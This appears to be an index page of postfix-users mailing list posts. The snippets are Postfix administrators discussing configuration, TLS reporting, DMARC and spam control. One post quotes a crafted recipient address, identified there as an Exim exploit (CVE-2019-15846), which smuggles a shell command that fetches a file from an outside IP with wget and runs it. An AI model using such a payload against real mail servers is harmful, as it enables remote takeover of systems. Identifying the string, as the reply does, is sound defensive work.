[pfx] Re: TLSRPT issue

Am 17.01.25 um 15:00 schrieb Florian Piekert via Postfix-users: I can confirm it works again for me now. same here, thanks Wietse! Andreas ___ Postfix-users mailing list -- postfix-users@postfix.org To unsubscribe send an email to postfix-users-le.

[pfx] Re: TLSRPT issue

amp;& !valid_hostaddr(domain, DONT_GRIPE)) smtp_tlsrpt_create_wrapper(state, domain); else applied to -20250107 but I didn't note any change - still no warning about a missing tlsrpt socket - if the socket is present, no tlsrpt data are written to that socket

[pfx] Re: limit sender by recipient domain (SOLVED)

Am 16.01.25 um 20:56 schrieb A. Schulze via Postfix-users: Am 16.01.25 um 20:18 schrieb A. Schulze via Postfix-users: But there is an additional requirement: - example.ORG receive messages from any senderdomain, - example.NET should only be reachable for a small set of senderdomains

[pfx] Re: limit sender by recipient domain

Am 16.01.25 um 20:18 schrieb A. Schulze via Postfix-users: But there is an additional requirement: - example.ORG receive messages from any senderdomain, - example.NET should only be reachable for a small set of senderdomains (authenticated by DMARC) /writing/ the requirement helps... the

[pfx] limit sender by recipient domain

Hello, I've an MX receiving for example.ORG Now, this MX should also handle messages for example.NET that's easy, add it to relay_domains ... But there is an additional requirement: - example.ORG receive messages from any senderdomain, - example.NET should only be reachable for a sm

[pfx] TLSRPT issue

Hello, I'm installing/running any postfix-3.10-* version in a lab environment. Till -20250103 the TLSRPT-part worked noiseless. But since -20250107 something is broken. My TLSRPT reporting engine no longer receive any data from postfix. If I disable the TLSRPT reporting engine, I not eve

[pfx] Re: Implicit TLS via SRV record?

ks on the opportunistic approach of STARTTLS I can't agree. A active attacker, able to strip STARTTLS from the EHLO server response, is also able to strip the SRV record from dns. It's only harder. I do not think, this is currentl

[pfx] Re: 8bit GECOS in From not encoded?

Am 01.12.24 um 17:07 schrieb Wietse Venema via Postfix-users: The remote server announces SMTPUTF8, but Postfix does not request SMTPUTF8. It is as if the SMTP client has "smtputf8_enable = no". Hello Wietse, I don't think it's an SMTPUTF8 issue. SMTPUTF8 primary handle non-ascii local par

[pfx] redundant TLS logging?

HA256 (128/128 bits) key-exchange x25519_kyber768 server-signature RSA-PSS (2048 bits) server-digest SHA256 This is a regular pattern in my logs I observe already for a long time. It's not new, it doesn't hurt but it feels unnecessary. It this an expected behavior or are there reasons to

[pfx] Re: no ptr, so i greylist

Benny Pedersen via Postfix-users: tux ~ # host 45.90.5.195 195.5.90.45.in-addr.arpa domain name pointer list.sys4.de. mx ~ # host 45.90.5.195 Host 195.5.90.45.in-addr.arpa not found: 2(SERVFAIL) Hi Benny, this seems to be a local problem on your side. But there is probably a glitch on

[pfx] Re: question about postmaster account

Am 28.07.24 um 10:03 schrieb Ralph Seichter via Postfix-users: Yes. The requirement has been specified as early as 1981 in RFC 822, and in its successors up to and including RFC 5322. https://datatracker.ietf.org/doc/html/rfc5321#section-4.5.1 5321 btw... Andreas __

[pfx] Re: Which DKIM application for postfix 3.9.0

it on production level. I run Solaris and therefore need to compile my applications, postfix and dkim. then you could give opendkim a change. use this branch as starting point: https://github.com/trusteddomainproject/OpenDKIM/tree/develop At the end you get signing+validation for rsa, ed25519 using ope

[pfx] Re: Log/Capture outbound messages?

On 1/26/2024 20:55:16, Viktor Dukhovni via Postfix-users wrote: On Fri, Jan 26, 2024 at 07:51:31PM -0500, Wietse Venema via Postfix-users wrote: joe a via Postfix-users: Postfix 3.5.9-5.9.2 Perhaps not a postfix question at all. Looking for a way to capture outbound email, for

[pfx] Re: Log/Capture outbound messages?

On 1/26/2024 19:51:31, Wietse Venema via Postfix-users wrote: joe a via Postfix-users: Postfix 3.5.9-5.9.2 Perhaps not a postfix question at all. Looking for a way to capture outbound email, for troubleshooting purposes. Is "smtp-sink" the way to do this? That could be,

[pfx] Log/Capture outbound messages?

Postfix 3.5.9-5.9.2 Perhaps not a postfix question at all. Looking for a way to capture outbound email, for troubleshooting purposes. Is "smtp-sink" the way to do this? ___ Postfix-users mailing list -- postfix-users@post

[pfx] Re: Postfix stopped logging lines with sender IP addresses after upgrade

Am 02.01.24 um 20:44 schrieb Vince Heuser via Postfix-users: smtp   inet  n   -   y   -   -   smtpd Hi, the smtp server run chroot. You need to configure syslog to listen on /path/to/postfix-chroot/dev/log (usually /var/spool/postfix/dev/log) Andreas __

[pfx] Value of client certificates, was: Re: Re: [ext] list.sys4.de fails with starttls

. Hello Viktor, OK, so far I can follow your arguments. But there is one thing that don't match in that picture: It's how I see Google's outbound servers operate. ¹) If I read my mail archive right, Google use client certificates at least since 2015! If operating SMTP client

[pfx] Re: pattern matching in local tables

On 7/7/2023 5:12 PM, Wietse Venema via Postfix-users wrote: joe a via Postfix-users: On 7/7/2023 3:46 PM, joe a via Postfix-users wrote: One hesitates to post this. Found some oddness when changing a destination in transport_maps (transport_maps = lmdb:/etc/postfix/transport). Seems related

[pfx] Re: pattern matching in local tables

On 7/7/2023 3:46 PM, joe a via Postfix-users wrote: One hesitates to post this. Found some oddness when changing a destination in transport_maps (transport_maps = lmdb:/etc/postfix/transport). Seems related to pattern matching. The file /etc/postfix/transport contains entries of this form

[pfx] pattern matching in local tables

One hesitates to post this. Found some oddness when changing a destination in transport_maps (transport_maps = lmdb:/etc/postfix/transport). Seems related to pattern matching. The file /etc/postfix/transport contains entries of this form: somename-xyz.comnoauth:ipaddress_1

[pfx] Re: Ongoing authentication issue, SASL support?

On 7/6/2023 5:12 PM, Noel Jones via Postfix-users wrote: On Jul 6, 2023, at 2:55 PM, joe a via Postfix-users wrote: On 7/6/2023 12:56 PM, joe a via Postfix-users wrote: On 7/6/2023 8:53 AM, Viktor Dukhovni via Postfix-users wrote: On Thu, Jul 06, 2023 at 08:32:42AM -0400, joe a via

[pfx] Re: Ongoing authentication issue, SASL support?

On 7/6/2023 12:56 PM, joe a via Postfix-users wrote: On 7/6/2023 8:53 AM, Viktor Dukhovni via Postfix-users wrote: On Thu, Jul 06, 2023 at 08:32:42AM -0400, joe a via Postfix-users wrote: While chasing a postfix (version 3.5.9) to dovecot authentication issue, checked "compiled in&quo

[pfx] Re: Ongoing authentication issue, SASL support?

On 7/6/2023 8:53 AM, Viktor Dukhovni via Postfix-users wrote: On Thu, Jul 06, 2023 at 08:32:42AM -0400, joe a via Postfix-users wrote: While chasing a postfix (version 3.5.9) to dovecot authentication issue, checked "compiled in" methods: postconf -a cyrus dovecot p

[pfx] Ongoing authentication issue, SASL support?

While chasing a postfix (version 3.5.9) to dovecot authentication issue, checked "compiled in" methods: postconf -a cyrus dovecot postconf -A cyrus Does this mean the choices for configuring authentication are affected? Dovecot and Postfix were installed from packaged versio

[pfx] Re: mail relayed for new server rejected by SIP

On 7/4/2023 9:55 PM, joe a via Postfix-users wrote: I realize this is lacking information normally requested, but before sending such, was hoping for a bit of a sanity check, without seriously annoying those more knowledgeable than I. Have working version of postfix 3.5.9 which acts as a

[pfx] mail relayed for new server rejected by SIP

I realize this is lacking information normally requested, but before sending such, was hoping for a bit of a sanity check, without seriously annoying those more knowledgeable than I. Have working version of postfix 3.5.9 which acts as a relay for a low volume in house system, authenticating

[pfx] Re: Postfix sending to undefined (?)

On 7/2/2023 7:07 PM, Viktor Dukhovni via Postfix-users wrote: On Sun, Jul 02, 2023 at 06:49:53PM -0400, joe a via Postfix-users wrote: > Viktor Dukhovni via Postfix-users Sun, 02 Jul 2023 14:21:52 -0700 > >On Sun, Jul 02, 2023 at 05:11:52PM -0400, joe a via Postfix-use

[pfx] Re: Postfix sending to undefined (?)

> Viktor Dukhovni via Postfix-users Sun, 02 Jul 2023 14:21:52 -0700 > >On Sun, Jul 02, 2023 at 05:11:52PM -0400, joe a via Postfix-users >wrote: > >> When attempting to send an email to postfix on that box, for delivery >to >> the local dovecot (via lmtp), the mess

[pfx] Postfix sending to undefined (?) relay

Setup a test system with dovecot and postfix, version 3.5.9, intending to create an "imap server" for local use. When attempting to send an email to postfix on that box, for delivery to the local dovecot (via lmpt), the message instead goes out to my ISP in the fashion of current

[pfx] surprise with strict_mime_encoding_domain

Hello, an SMTP Server with strict_mime_encoding_domain=yes blocked some messages (which was ... unexpected) # postconf mail_version mail_version = 3.7.4 # postconf -n alias_maps = maillog_file = /dev/stdout smtpd_recipient_restrictions = defer strict_mime_encoding_domain = yes # postconf -M s

[pfx] Re: The joke writes itself.

Some of us don't have a choice and are stuck with MS mail products due to work policies. while OWA does now support header filtering, that has not always been the case. Other may be in similar situations with required clients that don't have all the features you want for a power user

[pfx] Re: The joke writes itself.

sting by members only." (and yes, the new list-id actually has postfix-users.postfix.org, instead of @.) RobertC (ps and before anyone gets mad at me for top-posting replies, take a minute to tell me how to make OWA do that. I can't find any way to change it.)

[P-U] OpenDMARC crash, was: Re: Postfix lists are migrating to a new list server

Am 07.03.23 um 20:37 schrieb postfix--- via Postfix-users: OpenDMARC is segfaulting. That's what 'signal 11' means. Postfix fails to get an answer to its end-of-body milter call because of the segfault closing the other end of that socket. That failure results in Postfix s

[P-U] Re: Postfix lists are migrating to a new list server

quests. Open subscription, unmoderated, posting by members only." So filtering on List-Id contents didn't work. RobertC From: Benny Pedersen via Postfix-users Sent: Tuesday, March 7, 2023 11:02 To: postfix-users@postfix.org Subject: [P-U] Re: Postfix lists

Authenticated Receive Chain (ARC Sealing) in Postfix?

I have a request from my downstream Exchange admins to look into implementing ARC sealing in some postfix relay servers we use for address rewriting. From the bit of research I've done, it looks like this would require being implemented in an external milter. I had not even heard o

Re: dig reports NXDOMAIN but Postfix thinks otherwiese

Am 06.12.22 um 19:06 schrieb Fred Morris: This is a good use for DNS Response Policy Zones (RPZ) to prevent leakage, as well as an illustration of why doing some broad brush statistical monitoring of DNS traffic is a useful practice. it's easier to consequent avoid 'searc

Re: [External] Re: Outlook TLS errors after Microsoft Windows Update

Transport Layer Security (TLS) connections. These connections might have handshake failures. For developers, the affected connections are likely to send multiple frames followed by a partial frame with a size of less than 5 bytes within a single input buffer. If the connection fails, your app will

Re: [External] What does AW mean - was - Re: AW: RSA and ECDSA - warning: No certs for key at index 1

On 5/31/2022 10:18 AM, Bret Busby wrote: I keep seeing "AW" prepended to message subjects and I have no idea of what it means. What does it mean? I believe it's the German equivalent for re: (https://en.wikipedia.org/wiki/List_of_email_subject_abbreviations) as in Regarding. Regards, KAM

Re: DMARC in postfix ?

Am 13.04.22 um 05:31 schrieb John Levine: > For doing DMARC validation, I know about the opendmarc milter. Is that what > everyone uses? Is there anything else used in pratice? Hello John, rspamd handle DMARC as well. But it's also a milter. This is intentional: Wie

Re: [External] Re: Why the name Postfix?

Great Idea!  Done On 3/27/2022 6:08 PM, lists wrote: Perhaps someone who knows how to update wiki can add this information. https://en.wikipedia.org/wiki/Postfix_(software)

Tuning question for very large mail batches

Howdy! I'm trying to figure out some tuning for a cluster of postfix servers behind a load balancer. The load balancer simply does a round-robin of 4 nodes, direct TCP passthrough and does not mangle the traffic in any way. We are running RHEL/CentOS 7 packaged Postfix 2.10 currently.

Re: GhettoForge Postfix3

mT7WZlQE0_oAHiOY8Q18RdCHxYJdQrg-KVMctdl7YbYouHyQN4K47Dk6NkZ8$ > it's the > latest (presumably stable) release. They appear to have Postfix > 3.6 at this time. Yes, I see that. But why "Postfix3"? How is that different from normal Postfix? If it's a repo providing the same

strict_7bit_headers, strict_8bitmime and strict_8bitmime_body

Hello, the documentation say for these settings: > This feature should not be enabled on a general purpose mail server, because > it is likely to reject legitimate email Is it possible to activate a kind of log only mode similar to "warn_if_reject"? That would allow admini

Re: Mail bypassing relayhost configuration

error:undeliverable I am not finding anywhere in our configuration where email.site.com is set to use an alternate transport. This is a grep through the postfix config for any entry of our domain. Nothing there stands out as a transport config. # cd /etc/postfix # grep -i site * main.cf:mydomain

Mail bypassing relayhost configuration

Howdy! We have noticed that certain email going through our outbound relay are ignoring the "relayhost = [smtp-relay.site.com]:25". The condition seems to be when a message has an envelope rewrite based on LDAP lookup (specifically, from site.com to email.site.com, which goe

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

On 10/11/2021 6:28 PM, Carl Brewer wrote: http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. Carl, I noticed this and wanted to mention if you are using something like Google's quad8 for your resolver?  If so, install a ca

Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

and wanted to mention if you are using something like Google's quad8 for your resolver?  If so, install a caching local nameserver. You might also consider adding the KAM channel to your rules. Over 17 years of publishing them for the world for free now: https://mcgrail.com/tem

Re: logging from scripts executed by pipe

Wietse Venema: A. Schulze: Is there a recommended/any way to log messages from a script via postfix? Not at this time. Making the postlog command setgid requires a security analysis and that may require some code restructuring before this can be done without opening up a security hole

logging from scripts executed by pipe

Hello, I've to rebuild a service: messages to an address are delivered via postfix pipe to a script. This script use syslog to write it's messages. That worked well for years. Now, postfix run in a different way, supervised via "postfix start-fg" (docker) Essentially the is

Re: Speaking of Firefox and HTTP^H^H^H^HFTP...

Because FTP lets me PUT files into a location without the hassle of setting up some kind of upload script, where you have to filter and tinker with permissions, so that you don't allow a malicious executable to be uploaded that can simply be run by visiting said file in a browser? Grant

Re: [External] Postfix and Mimedefang for single user?

Hi LuKreme, I believe once you hook in MIMEDefang with postfix, it's a general purpose filter that uses the milter interface to process emails at various stages of the mail dialogue and processing.  It hurts my brain to think about whether Postfix could do a filter on the recipients and

Re: Deprecated: white is better than black

; Postfix version 3.6 deprecates terminology that implies white is >> better than black. On 24.02.21 19:29, Jaroslaw Rafa wrote: >-1 > >I already wrote when there was a discussion about it that changing this is a >waste of time and effort. > >"Blacklist" and &quo

Re: [External] Re: Deprecated: white is better than black

If it helps with others, the SA project uses WelcomeList and BlockList so you don't have to change acronyms like RBL.  Some slides from a talk at https://mcgrail.com/downloads/DevFest%202020%20-%20Removing%20Racially%20Charged%20Language%20from%20Technology%20Speaker%20Presentation%

Re: client and ehlo hostname mismatch

My primary outbound relay cluster connects through a load balancer NAT so when it gives "helo host1.services.domain.tld" it actually reverses to the hostname assigned to the load balancer (relay.domain.tld). there are multiple nodes that all lookup with the single NAT IP when

Re: File-format for Included Files for main.cf Options

27;s not in the documentation anywhere. It's not clear where would be a good place to write it up, without repeating the explanation in-line everywhere a file argument is mentioned. The additional clarification about comments needing to start in the first column was helpful, and good to know

File-format for Included Files for main.cf Options

Hi, I can't find it in the docs or from a search of this mailing-list... When a main.cf entry specifies a filename, I know the contents are inserted in place. But the exact format of said file is unclear. I don't think it is literally "included" in-line, because a file tha

Re: [External] SPAM attack from bounce techniques

On 12/29/2020 7:37 AM, Rafael Azevedo wrote: Hi there, I've noticed that one of our servers is receiving a huge amount of unauthorized requests. User connects to our server and tries to send an email to any destination. Our servers denies the message because user is not authenticated.

Re: Security threat posed by names and IPs in SMTP headers

Wow! Thanks, I didn't realize this was an option. A really pretty balance of maintaining the internal routing information for troubleshooting purposes without sending it to the Internet. Not totally settled on the actual level of threat posed by leaking this info, but a great option to

Re: Security threat posed by names and IPs in SMTP headers

Hi Wietse, I definitely agree there are LOTS more important things in the world to be worried about when connecting a system to an untrusted network, I was just curious how much people doing this in the real world were worried about the information leakage that sits somewhere between "inh

Security threat posed by names and IPs in SMTP headers

I haven’t been able to find any particularly good guidance about this on the Internet so I figured I’d ask those in the trenches for their opinions regarding where they land on this. I know it’s not a Postfix specific matter and if anyone thinks I should be posing this question elsewhere

Re: Mail server without MX record.

Am 13.10.20 um 14:09 schrieb Jason Long: > I want to know can I use it without MX record? A records are used by default if no MX is available That's nothing postfix specific - it's an RFC requirement for any MTA Andreas

Re: Why emails sending to Spam?

That's a wildly open question. Your first step is to look at the headers of a message you've sent on the received end. Most anti-spam filters leave artifacts in the headers and my guess is that will lead you to something you can change about your mail server to make your messages

Re: [External] Re: postfix and MX

inguish plans are well known but I also think a thing of the past.  I've been pretty impressed by their netizenship in the past decade.  Not saying it didn't take the US DoJ for a wake-up call but really impressed with what I've seen.  Is there a specific and recent example you can think of? Regards, KAM

Re: [External] spam uses my email address as sender in "header from"

On 9/14/2020 6:35 AM, Fourhundred Thecat wrote: > Can I reject messages that have different envelope from and header from? > > Or what would be the best approach ? Are you publishing an SPF record?  Are you using DKIM?  Are you publishing a DMARC policy (even one with policies of no

debugging strategy

Hello, I operate a postfix server + some milters. Some messages running over this MTA generate some trouble on the receiver side. I nailed down the problem to be the content, I receive from the client. It's an application I personally don't control. To Debug the problem, I must as

Behavior change in notifications after upgrading Postfix from 2.6.6 to 3.3.1

We recently migrated a few of our mail servers from RHEL 6 with Postfix 2.6.6, to RHEL 8 with Postfix 3.3.1. I noticed a change in behavior after we upgraded, and I wondered if anyone had any insight into the change. Before, while Postfix would send undeliverable messages from MAILER-DAEMON

Re: Cannot assign requested address -- with "inet_protocol = ipv4" in main.cf

Am 25.06.20 um 20:58 schrieb Greg Sims: > I set "inet_protocol = ipv4" in main.cf . postconf inet_protocol postconf: warning: inet_protocol: unknown parameter postconf inet_protocols ? Andreas

Re: Questions about the master.cf file

Hi Doug, Very much appreciate your response. In combination with Noel’s email, I think I get what’s going on now. All of this was, of course, in the service type section of http://www.postfix.org/master.5.html. Once I had an idea what I was looking for and gave it a slow re-read, it’s all

Re: Questions about the master.cf file

Hi Noel, Thanks very much for your reply. For some reason, I had assumed that the service name was dictated by convention, not the contents of /etc/services. I DID have a nagging question about how Postfix knew to listen on 25 and 587, but I assumed it was a system default and I had just

Questions about the master.cf file

In the context of looking at implementing Postscreen, I’ve read through the postscreen readme, the master.cf man page, and postfix architectural overview docs, but I have some remaining service related questions I might appeal to one of the gurus on the list to help me with. In a default

Re: [External] Re: The historical roots of our computer terms

On 6/8/2020 9:54 AM, vi...@vheuser.com wrote: > > On 2020/06/08 09:31 AM, Kevin A. McGrail wrote: >> On 6/8/2020 9:06 AM, John Dale wrote: >>> Why does this agitate people?  Because if the time spend on this >>> change had been used to fix an actual deficiency, p

Re: [External] Re: The historical roots of our computer terms

On 6/8/2020 9:06 AM, John Dale wrote: > Why does this agitate people?  Because if the time spend on this > change had been used to fix an actual deficiency, people of color who > use the software would have been served with value, not just platitudes. Sounds like a lot of pontificating.

Re: [External] Re: The historical roots of our computer terms

On 6/8/2020 8:37 AM, Phil Stracchino wrote: > The color is widely and somewhat sardonically known as 'bleen' or 'grue'. See, that's just wrong. We all know what a Grue is... Regards, KAM https://zork.fandom.com/wiki/Grue

Re: Postfix restrictions

Am 07.06.20 um 14:38 schrieb yuv: > Is there a valid reason for a sender not to fix something so essential > as DNS configuration? no valid reason but reality. There are so many sendings hosts named "foobar.local". Via NAT they are visible with a public IP and a perfect DNS

Re: Postfix restrictions

Am 07.06.20 um 11:51 schrieb Nicolas Kovacs: using "reject_unknown_helo_hostname" may trigger some false positives. Not every sender have such perfect setups. You may use "warn_if_reject reject_unknown_helo_hostname" for some time and check if loosing such traffic is acceptable for you. Andr

Re: [External] Re: The historical roots of our computer terms

On 6/6/2020 11:00 AM, Ian Evans wrote: > > > On Sat, Jun 6, 2020, 10:28 AM Kevin A. McGrail, <mailto:kmcgr...@pccc.com>> wrote: > > Thanks for the reminder on this.  The Apache SpamAssassin project > voted to do this change on May 3rd and I'm takin

Re: [External] Re: The historical roots of our computer terms

How easy would it >> be for Postfix/Postscreen configs/docs to, say, refer to allow/deny lists? > Easily, if they can be acessed via DNSBL/DNSWL qeueries. Any 'new' > lookup mechanism will have to be added through a postscreen policy > plugin, and that involves new Postfix co

Dropping email purporting to be from my domain received from the Internet

In my hypothetical environment, I have an external and an internal relay on either sides of a firewall. I want to configure the external system to relay both 1) email received from the internal relay to the Internet and 2) email received from the Internet to the internal relay (as long as the

Re: Relationship between relay and transport

Thanks very much for the reply. I think my root difficulty was understanding the hierarchy behind forwarding rules (in this specific case; between relay and transport related parameters / tables). Your examples put me onto http://www.postfix.org/transport.5.html which gave me a much better idea

Relationship between relay and transport

I’m trying to get a better understanding of the relationship between relay and transport. In the standard config on an email gateway in (http://www.postfix.org/STANDARD_CONFIGURATION_README.html#firewall) the proposed config has relay_domains set for example.com and transport_maps set to a

OFF-TOPIC: Re: [External] Re: why DMARC PASS even SPF got failed

> Scott, I have another question. Gents, I love geeking about email and spam techniques but these are not postfix related nor do they relate to beer*.  IMO these should be discussed elsewhere. Regards, KAM * There are some mailing lists with exclusions that discussions on beer are always on-top

Re: [External] command injection by crafted recipient address

On 3/12/2020 4:40 PM, kris_h wrote: > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost It's an exim exploit.  See CVE-2019-15846. Regards, KAM

Re: [External] Re: SPF IP addresses limit question

n the anti-spam world, we analyze SPF records for indicators that they are overly broad and non-specific as an indicator of a lack of postmaster hygiene.  And if your SPF is poorly done and others can spoof your domain by having adjacent IPs, that's bad too!  Make your SPF record as accurate an

Re: [External] Re: SPF IP addresses limit question

On 2/23/2020 7:08 PM, Scott Kitterman wrote: > The limits are a function of DNS, not SPF, which is why RFC 7208 Section 3.4. > was written. I would there is also a somewhat arbitrary limit that was picked that doesn't t match the real world.  See https://bz.apache.org/SpamAssassin/s

Re: How to restrict imposters

> @lbutlr wrote: >> > a wrote: >> > > However, an outside network can still identify as a local email >> > > account to send into my network, making imposters possible. >> > >> > Do not allow connections on port 25 that claim to be from your do

Re: How to restrict imposters

> @lbutlr wrote: > > a wrote: > > > However, an outside network can still identify as a local email > > > account to send into my network, making imposters possible. > > > > Do not allow connections on port 25 that claim to be from your domains. > >

How to restrict imposters

aying from outside networks to other email addresses and that's how I need it to work. It's great postfix is set to do this by default. However, an outside network can still identify as a local email account to send into my network, making imposters possible. Is there a flag I can use to s

Re: Are there plans for a buld-in support of REDIS-tables?

Am 09.01.20 um 17:12 schrieb kris_h: > We distribute the more dynamic tables - e.g. cidr-tables with self-harvested > current spammer's IPs - actually by simply distributing those files with > rsync. we use an rbldnsd to build and serve an internal zone with similar data. Usual DNS lookups are

MDB_MAP_FULL: Environment mapsize limit reached

Hello, running postfix-3.4.7 on Debian 10 I found the following warning in my logs: postfix/tlsmgr[705]: warning: lmdb:/var/lib/postfix/smtp_tls_session_cache is unavailable. open database /var/lib/postfix/smtp_tls_session_cache.lmdb: MDB_MAP_FULL: Environment mapsize limit reached on

Re: [External] Block email based on reply field

If you have integrated with Apache SpamAssassin, then v3.4.3 introduces the ability to do RBL lookups on the domain in Reply-to as well as the ability to do hashed lookups. Regards, KAM On 12/11/2019 9:38 PM, li...@lazygranch.com wrote: > I have a spammer who uses all sorts of "from&qu

Re: different message_size_limit per smtpd (solved)

is >> enforced by the cleanup daemon. > > How do you set a different limit in cleanup then? Or do you set > message_size_limit to the maximum size for submission and then set a separate > limit for smtpd? How would you do that? > > main.cf: >message_size_limit=4000

different message_size_limit per smtpd

Hello, My goal is to allow different message size on MX and submission. As message_size_limit is a cleanup option, this is my (non working) setup based on http://www.postfix.org/BUILTIN_FILTER_README.html#mx_submission main.cf message_size_limit = 512 master.cf # define a

Re: may we suggest ICANN not run that many new tlds?

Am 19.11.19 um 10:58 schrieb Merrick: > may we suggest ICANN not open a new TLD anymore? yes, you can: https://www.icann.org/public-comments

Re: postfix startup sequence

Am 12.11.19 um 03:52 schrieb Fourhundred Thecat: > /usr/sbin/postfix quiet-quick-start this is Debian specific https://sources.debian.org/src/postfix/3.4.5-1/debian/patches/09_quiet_startup.diff/ You've to ask on a Debian list because - Wietse already noted - it's unsupported Andreas

build in EDH parameters

(https://tools.ietf.org/html/rfc7919) offer a "Supported Groups Registry" Andreas

Re: block 'new style' TLDs ?

is not allowed >> >> >> Of course your list will differ than mine, but I find this much >> better than reacting to which of these new garbage TLDs are spamming >> me this week. > > You can achieve a similar result with this addition to SA's custom.cf: > &g

Re: "SPF no-mail record" clashing with reject_unknown_recipient_domain

Ehlers, Y.W. (Ydo): There is no MX record, there is no A record, so mail can not be delivered. And Microsoft tops it off by explicitely claiming no e-mail will be send from this domain for the record: one like to use RFC 7505 to express "this domain don't send / receive email&qu

Re: Respecting MTA-STS

t it's also known, Gmail is able to do such stuff very selective to prevent damage. In theory, an SMTP client, postfix smtp for example, could always try to connect to a remote destination using SNI, log success or failure and fallback to reconnect without SNI. That would enable users to gathe

Re: Respecting MTA-STS

known by a dozen names, unless the SNI is provided. I don't fully understand the value of SNI for MTA-to-MTA communication, but that's an other problem. I suggest to look at https://github.com/Snawoot/postfix-mta-sts-resolver ... Andreas

Re: Refuse mail from hosts with closed port 25

On 9/16/2019 11:00 AM, Benny Pedersen wrote: > Kevin A. McGrail skrev den 2019-09-16 16:19: >> Fair enough.  Maybe he should turn that feature on then :-) > > if you do you cant recieve email from me > > validMX is strict to say domains without MX is invalid domain ? > >

  1   2   3   4   5   6   >